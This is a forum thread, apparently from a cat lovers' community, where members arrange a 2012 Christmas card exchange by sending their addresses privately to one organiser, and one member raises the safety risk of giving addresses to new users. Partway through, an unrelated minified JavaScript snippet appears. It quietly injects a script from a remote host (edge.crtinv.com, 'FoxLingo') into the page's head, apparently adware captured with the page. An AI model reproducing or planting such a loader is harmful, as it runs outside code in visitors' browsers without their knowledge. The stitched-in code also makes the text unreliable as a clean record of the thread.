I think it was last year, or maybe the year before that some of us did a snail mail Christmas Card Exchange.

I typically send cards to my family and friends, but rarely do I ever get any in return.  So it was great fun to open the mail box almost daily to find cards coming from around the world. And it was especially sweet that they were from fellow cat lovers because some of the cards also included greetings from our cats :)

If you want to participate, the way it works is this:

1.  Send me a PM with your name and address;

2.  I'll keep track and then send everyone who PM's me, the names and addresses (including the TCS handle) on December 1, 2012.

Since the name/address distribution is different this year,  I'm setting a deadline for November 30, 2012 to get your PM into me.

That's not to say you can't participate after that, but you will have to contact people individually to exchange information after that date.

EDITED:   To change the way names and addresses are distributed

We did this last year, I loved it!!

Count me in! (again!) I'm already brainstorming ideas for our Family Christmas picture (Hubby, Me, Smokie & Bandit) :)

One thing I might add, when you do send the cards- everyone should put their handle inside as well as their name, so we know who is who!

What might be a little easier is to have one person in charge of the names and addresses. Give people until a certain date to PM that one person (maybe you, Linda?) with their name and address (and names of their cats). You keep track of everybody, then once that date has passed, you PM everybody who told you they were interested with all the names and addresses, like a Christmas List of everybody who wants to be included. That would be easier than everybody PMing everybody else and maybe PMs getting lost in the shuffle. What about that? Think that would work?

Ok, I edited my post to ask everyone to PM me, and then I'll PM everyone who PM's me, at the end of November, with the list.

A friendly suggestion - limit this to certain usergroups. Thinking personal safety here, as I'm sure no one would want their full name and address provided to someone who just recently signed up and of whom we know nothing about. Again, friendly suggestion only :)

!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();

Of course you can!  Last year we were sending cards all around the world!  Just send me a PM with your name and address and I'll include you in the list I send out on December 1st.

Got it.  Just so people know, I'm not replying to people who PM their address. I'm simply funneling the PM to a folder for safe keeping for the time being.
